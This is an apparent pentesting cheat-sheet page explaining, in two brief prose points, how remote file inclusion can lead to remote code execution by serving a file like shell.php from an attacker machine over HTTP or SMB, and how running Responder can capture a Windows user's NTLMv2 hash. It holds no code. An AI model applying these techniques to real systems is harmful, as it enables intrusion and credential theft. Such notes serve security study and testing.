RFI to RCE

  1. We need to run malicious files from attacker system to get RCE via RFI (eg. shell.php) but sometimes HTTP traffic isn't allowed. We can try using SMB share (especially in Windows).

  2. In case of Windows, we can try fetching a file via RFI with responder turned on in the attacker machine. This way we may get the user's NTLMv2 Hash.

    Check Notion for full exploit.

PreviousPath traversal / LFI to RCENextSSRF to RCE

Last updated